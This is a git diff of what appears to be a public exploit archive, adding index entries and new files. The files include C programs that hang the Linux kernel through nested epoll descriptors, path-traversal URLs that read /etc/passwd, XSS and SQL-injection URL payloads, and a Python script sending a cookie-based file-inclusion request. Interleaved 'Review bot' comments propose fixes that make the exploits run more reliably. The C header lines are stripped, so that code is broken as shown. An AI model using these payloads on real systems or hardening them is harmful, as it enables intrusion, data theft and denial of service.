diff --git a/files.csv b/files.csv
index ec38059f6..e25fee073 100755
--- a/files.csv
+++ b/files.csv
@@ -450,14 +450,14 @@ id,file,description,date,author,platform,type,port
 585,platforms/windows/dos/585.pl,"MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0
 586,platforms/linux/local/586.c,"BitchX 1.0c19 Local Root Exploit (suid?)",2004-10-20,Sha0,linux,local,0
 587,platforms/linux/local/587.c,"Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit",2004-10-21,xCrZx,linux,local,0
-588,platforms/windows/remote/588.py,"Ability Server 2.34 FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21
+588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21
 589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0
 590,platforms/windows/remote/590.c,"ShixxNote 6.net Remote Buffer Overflow Exploit",2004-10-22,class101,windows,remote,2000
 591,platforms/linux/local/591.c,"socat <= 1.4.0.2 - Local Format String Exploit (not setuid)",2004-10-23,CoKi,linux,local,0
 592,platforms/windows/remote/592.py,"Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit",2004-10-23,KaGra,windows,remote,21
 593,platforms/windows/dos/593.pl,"Quick 'n EasY VER 2.4 Ftp Server remote D.o.S",2004-10-24,KaGra,windows,dos,0
 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit",2004-10-24,KaGra,windows,dos,0
-598,platforms/windows/remote/598.py,"MailCarrier 2.51 SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25
+598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25
 599,platforms/windows/dos/599.py,"BaSoMail Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0
 600,platforms/linux/local/600.c,"GD Graphics Library Heap Overflow Proof of Concept Exploit",2004-10-26,N/A,linux,local,0
 601,platforms/linux/local/601.c,"libxml 
2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0
@@ -9843,7 +9843,7 @@ id,file,description,date,author,platform,type,port
 10617,platforms/linux/dos/10617.txt,"Printoxx - Local Buffer Overflow",2009-12-23,sandman,linux,dos,0
 10618,platforms/windows/local/10618.py,"Adobe Reader and Acrobat",2009-12-23,"Ahmed Obied",windows,local,0
 10619,platforms/windows/local/10619.c,"Easy RM to MP3 27.3.700 local BOF xp sp2",2009-12-23,bibi-info,windows,local,0
-10620,platforms/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 BoF Exploit",2009-12-23,dijital1,windows,local,0
+10620,platforms/windows/local/10620.py,"Easy RM to MP3 2.7.3.700 - BoF Exploit",2009-12-23,dijital1,windows,local,0
 10621,platforms/php/webapps/10621.txt,"XP Book 3.0 - login Admin Exploit",2009-12-23,"wlhaan hacker",php,webapps,0
 10624,platforms/php/webapps/10624.txt,"Joomla Component com_carman Cross Site Scripting Vulnerability",2009-12-24,FL0RiX,php,webapps,0
 10625,platforms/php/webapps/10625.txt,"Joomla Component com_jeemaarticlecollection SQL injection",2009-12-24,FL0RiX,php,webapps,0
@@ -31881,3 +31881,14 @@ id,file,description,date,author,platform,type,port
 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 'tagcloud' Parameter Cross Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0
 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 '.ksf' File Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0
 35399,platforms/windows/remote/35399.pl,"DivX Player 6.x '.dps' File Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,windows,remote,0
+35400,platforms/php/webapps/35400.txt,"BackWPup Plugin 1.4 for WordPress Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps,0
+35401,platforms/php/webapps/35401.txt,"SnapProof 'retPageID' Parameter Cross Site Scripting Vulnerability",2011-02-28,"difficult 511",php,webapps,0
+35402,platforms/php/webapps/35402.txt,"Forritun Multiple SQL Injection Vulnerabilities",2011-03-02,eXeSoul,php,webapps,0
+35403,platforms/linux/dos/35403.c,"Linux Kernel 2.6.x epoll Nested Structures Local DoS",2011-03-02,"Nelson Elhage",linux,dos,0
+35404,platforms/linux/dos/35404.c,"Linux Kernel 2.6.x fs/eventpoll.c epoll Data Structure File Descriptor Local DoS",2011-03-02,"Nelson Elhage",linux,dos,0
+35405,platforms/php/webapps/35405.txt,"VidiScript 'vp' Parameter Cross Site Scripting Vulnerability",2011-03-02,NassRawI,php,webapps,0
+35406,platforms/php/webapps/35406.txt,"Support Incident Tracker (SiT!) 
3.62 Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps,0
+35407,platforms/php/webapps/35407.txt,"phpWebSite 1.7.1 'local' Parameter Cross Site Scripting Vulnerability",2011-03-03,"AutoSec Tools",php,webapps,0
+35408,platforms/php/webapps/35408.txt,"xtcModified 1.05 Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
+35409,platforms/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta Multiple Cross Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps,0
+35410,platforms/windows/remote/35410.py,"InterPhoto Image Gallery 2.4.2 'IPLANG' Parameter Local File Include Vulnerability",2011-03-04,"AutoSec Tools",windows,remote,0
diff --git a/platforms/linux/dos/35403.c b/platforms/linux/dos/35403.c
new file mode 100755
index 000000000..a251cd1d6
--- /dev/null
+++ b/platforms/linux/dos/35403.c
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/46630/info
+
+The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities.
+
+Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users.
+
+#include
+ #include
+ int main(void) {
+ int e1, e2, p[2];
+ struct epoll_event evt = {
+ .events = EPOLLIN
+ };
+ e1 = epoll_create(1);
+ e2 = epoll_create(2);
+ pipe(p);
+
+ epoll_ctl(e2, EPOLL_CTL_ADD, e1, &evt);
+ epoll_ctl(e1, EPOLL_CTL_ADD, p[0], &evt);
+ write(p[1], p, sizeof p);
+ epoll_ctl(e1, EPOLL_CTL_ADD, e2, &evt);
+
+ return 0;
+ }
\ No newline at end of file
diff --git a/platforms/linux/dos/35404.c b/platforms/linux/dos/35404.c
new file mode 100755
index 000000000..2450e3bb8
--- /dev/null
+++ b/platforms/linux/dos/35404.c
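Review bot: Every system call in main() discards its result: `pipe(p)`, `write()` and all three `epoll_ctl()` calls, so on a kernel where the nested registration is refused the program still exits 0 and gives no indication whether the condition under test was reached. Check each call and report failures, e.g. `if (pipe(p) == -1) { perror("pipe"); return 1; }` and `if (epoll_ctl(e1, EPOLL_CTL_ADD, e2, &evt) == -1) perror("epoll_ctl");`, so a reader can tell "not vulnerable" from "did not run". The two `#include` lines also appear with no header name in this rendering, presumably because the bracketed names were dropped as markup; if the archived file really reads this way it will not compile, and restoring the headers for epoll and the pipe/write calls is required before the file can be used to verify a fix.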
@@ -0,0 +1,75 @@
+source: http://www.securityfocus.com/bid/46630/info
+
+The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities.
+
+Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users.
+
+#include
+#include
+#include
+#include
+
+#define SIZE 250
+
+int main(void) {
+
+ int links[SIZE];
+ int links2[SIZE];
+ int links3[SIZE];
+ int links4[SIZE];
+ int i, j;
+ int ret;
+ int ep1, ep2;
+ struct timeval start, end;
+
+ struct epoll_event evt = {
+ .events = EPOLLIN
+ };
+
+ ep1 = epoll_create(1);
+ for (i = 0; i < SIZE; i++) {
+ links[i] = epoll_create(1);
+ ret = epoll_ctl(ep1, EPOLL_CTL_ADD, links[i], &evt);
+ if (ret)
+ perror("error 1");
+ }
+ for (i = 0; i < SIZE; i++) {
+ links2[i] = epoll_create(1);
+ for (j = 0; j < SIZE; j++) {
+ epoll_ctl(links[j], EPOLL_CTL_ADD, links2[i], &evt);
+ if (ret)
+ perror("error 2");
+ }
+ }
+ for (i = 0; i < SIZE; i++) {
+ links3[i] = epoll_create(1);
+ for (j = 0; j < SIZE; j++) {
+ epoll_ctl(links2[j], EPOLL_CTL_ADD, links3[i], &evt);
+ if (ret)
+ perror("error 3");
+ }
+ }
+ for (i = 0; i < SIZE; i++) {
+ links4[i] = epoll_create(1);
+ for (j = 0; j < SIZE; j++) {
+ epoll_ctl(links3[j], EPOLL_CTL_ADD, links4[i], &evt);
+ if (ret)
+ perror("error 4");
+ }
+ }
+
+ ep2 = epoll_create(1);
+ gettimeofday(&start, NULL);
+ ret = epoll_ctl(ep2, EPOLL_CTL_ADD, ep1, &evt);
+ /* creates a loop */
+ //ret = epoll_ctl(links4[499], EPOLL_CTL_ADD, ep1, &evt);
+ if (ret)
+ perror("error 5");
+ gettimeofday(&end, NULL);
+
+ printf("%ld\n", ((end.tv_sec * 1000000 + end.tv_usec)
+ - (start.tv_sec * 1000000 + start.tv_usec)));
+
+ return 0;
+
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/35400.txt b/platforms/php/webapps/35400.txt
new file mode 100755
index 000000000..2a3c5b0bc
--- /dev/null
+++ b/platforms/php/webapps/35400.txt
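Review bot: In the three nested loops that report `error 2`, `error 3` and `error 4`, the `epoll_ctl()` result is never stored, so each `if (ret)` re-tests the stale value left by the last `error 1` call: failures inside the nesting go unreported, and if that earlier call failed every iteration prints a misleading error instead. Write `ret = epoll_ctl(links[j], EPOLL_CTL_ADD, links2[i], &evt);` and the same for the `links2[j]` and `links3[j]` loops. The `epoll_create()` calls are also unchecked, and with 4 * SIZE + 2 epoll descriptors the process sits close to a typical default open-file limit, so a `-1` there would silently turn every later `epoll_ctl()` into an EBADF failure and make the elapsed time printed at the end meaningless. The commented-out `links4[499]` line indexes past the 250-element array and should read `links4[SIZE - 1]` if it is ever re-enabled.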
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46610/info
+
+The BackWPup plugin for WordPress is prone to multiple information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Attackers can exploit these issues to retrieve the contents of an arbitrary file. Information obtained may aid in launching further attacks.
+
+http://www.example.com/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1
+
+http://www.example.com/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd
\ No newline at end of file
diff --git a/platforms/php/webapps/35401.txt b/platforms/php/webapps/35401.txt
new file mode 100755
index 000000000..7d8a503b1
--- /dev/null
+++ b/platforms/php/webapps/35401.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46622/info
+
+SnapProof is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/cart.php?retPageID=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/35402.txt b/platforms/php/webapps/35402.txt
new file mode 100755
index 000000000..a51af3fec
--- /dev/null
+++ b/platforms/php/webapps/35402.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/46629/info
+
+Forritun is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/grein.php?id=[sqli]
+http://www.example.com/rit.php?id=[sqli]
+http://www.example.com/index.php?id=[sqli]
+http://www.example.com/sida.php?id=[SQLi]
\ No newline at end of file
diff --git a/platforms/php/webapps/35405.txt b/platforms/php/webapps/35405.txt
new file mode 100755
index 000000000..05702ecbf
--- /dev/null
+++ b/platforms/php/webapps/35405.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/46639/info
+
+VidiScript is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/index.php?vp=[XSS]
\ No newline at end of file
diff --git a/platforms/php/webapps/35406.txt b/platforms/php/webapps/35406.txt
new file mode 100755
index 000000000..bd7468329
--- /dev/null
+++ b/platforms/php/webapps/35406.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/46671/info
+
+Support Incident Tracker (SiT!) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Support Incident Tracker (SiT!) 3.62 is vulnerable; other versions may also be affected.
+
+http://www.example.com/sit-3.62/feedback.php?ax=--%3E%3Cscript%3Ealert(0)%3C%2fscript%3E
+http://www.example.com/sit-3.62/lib/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E
+http://www.example.com/sit-3.62/lib/magpierss/scripts/magpie_simple.php?url=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E
+http://www.example.com/sit-3.62/lib/magpierss/scripts/magpie_slashbox.php?rss_url=%22%3E%3Cscript%3Ealert(0)%3C%2fscript%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35407.txt b/platforms/php/webapps/35407.txt
new file mode 100755
index 000000000..fe98cac30
--- /dev/null
+++ b/platforms/php/webapps/35407.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46673/info
+
+phpWebSite is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+phpWebSite 1.7.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/phpwebsite_1_7_1/javascript/editors/fckeditor/editor/custom.php?local=%3Cscript%3Ealert(0)%3C%2fscript%3E http://www.example.com/phpwebsite_1_7_1/javascript/editors/fckeditor/editor/custom.php?local=%3Cscript%3Ealert(0)%3C%2fscript%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/35408.txt b/platforms/php/webapps/35408.txt
new file mode 100755
index 000000000..80e0828fe
--- /dev/null
+++ b/platforms/php/webapps/35408.txt
@@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/46681/info
+
+xtcModified is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+xtcModified 1.05 is vulnerable; other versions may also be affected.
+
+Cross-site scripting:
+
+http://www.example/admin/categories.php?search=prod">
+http://www.example/admin/orders.php?selected_box=customers">&status=0
+
+Html-injection:
+
+1.
+
+
+ + + + + + + + + + +'> +'> + +
+ + + +2. + +
+ +'> + + + + + + + + + + +
+ \ No newline at end of file diff --git a/platforms/php/webapps/35409.txt b/platforms/php/webapps/35409.txt new file mode 100755 index 000000000..821c30dc5 --- /dev/null +++ b/platforms/php/webapps/35409.txt @@ -0,0 +1,28 @@ +source: http://www.securityfocus.com/bid/46683/info + +Pragyan CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Pragyan CMS 3.0 beta is vulnerable; other versions may also be affected. + +
+'> +
+ + + +
+ +'> +'> +'> + + + +
+
\ No newline at end of file
diff --git a/platforms/windows/remote/34668.txt b/platforms/windows/remote/34668.txt
index dbcfe669d..6e0c023c0 100755
--- a/platforms/windows/remote/34668.txt
+++ b/platforms/windows/remote/34668.txt
@@ -23,4 +23,4 @@ http://localhost:80/?search=%00{.exec|cmd.} will stop regex from parse macro , and macro will be executed and remote code injection happen.
-## EDB Note: This vulnerability will run the payload multiple times. Make sure to take this into consideration when crafting your payload.
\ No newline at end of file
+## EDB Note: This vulnerability will run the payload multiple times simultaneously. Make sure to take this into consideration when crafting your payload (and/or listener).
\ No newline at end of file
diff --git a/platforms/windows/remote/35410.py b/platforms/windows/remote/35410.py
new file mode 100755
index 000000000..545b88fc7
--- /dev/null
+++ b/platforms/windows/remote/35410.py
@@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/46759/info
+
+InterPhoto Image Gallery is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+InterPhoto Image Gallery 2.4.2 is vulnerable; other versions may also be affected.
+
+# ------------------------------------------------------------------------
+# Software................InterPhoto 2.4.2
+# Vulnerability...........Local File Inclusion
+# Threat Level............Critical (4/5)
+# Download................http://www.weensoft.com/
+# Release Date............3/4/2011
+# Tested On...............Windows Vista + XAMPP
+# ------------------------------------------------------------------------
+# Author..................AutoSec Tools
+# Site....................http://www.autosectools.com/
+# Email...................John Leitch
+# ........................Bryce Darling
+# ------------------------------------------------------------------------
+#
+#
+# --Description--
+#
+# A local file inclusion vulnerability in InterPhoto 2.4.2 can be
+# exploited to include arbitrary files.
+#
+#
+# --PoC--
+
+import socket
+
+host = 'localhost'
+path = '/interphoto'
+port = 80
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+s.connect((host, port))
+s.settimeout(8)
+
+s.send('POST ' + path + '/about.php HTTP/1.1\r\n'
+ 'Host: localhost\r\n'
+ 'Connection: keep-alive\r\n'
+ 'User-Agent: x\r\n'
+ 'Content-Length: 0\r\n'
+ 'Cache-Control: max-age=0\r\n'
+ 'Origin: null\r\n'
+ 'Content-Type: multipart/form-data; boundary=----x\r\n'
+ 'Cookie: IPLANGV6O1or24t6cI=' + '..%2f' * 8 + 'windows%2fwin.ini%00\r\n'
+ 'Accept: text/html\r\n'
+ 'Accept-Language: en-US,en;q=0.8\r\n'
+ 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
+ '\r\n')
+
+print s.recv(8192)
\ No newline at end of file
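Review bot: `s.settimeout(8)` is applied only after `s.connect((host, port))`, so the connect itself has no timeout and can block indefinitely against an unresponsive host; move `s.settimeout(8)` above the connect. `s.send(...)` is also not guaranteed to transmit the whole request and its return value is ignored, and the socket is never closed — use `s.sendall(...)` and add `s.close()` after the final `recv`. The single `s.recv(8192)` reads at most one chunk, so the printed response may be truncated without any indication; a short comment saying so, or a read loop, would spare a reader a false negative. The script is Python 2 (`print s.recv(8192)` is the statement form), which the header block does not state; a one-line `# Python 2 script` comment next to `import socket` would save a SyntaxError on Python 3.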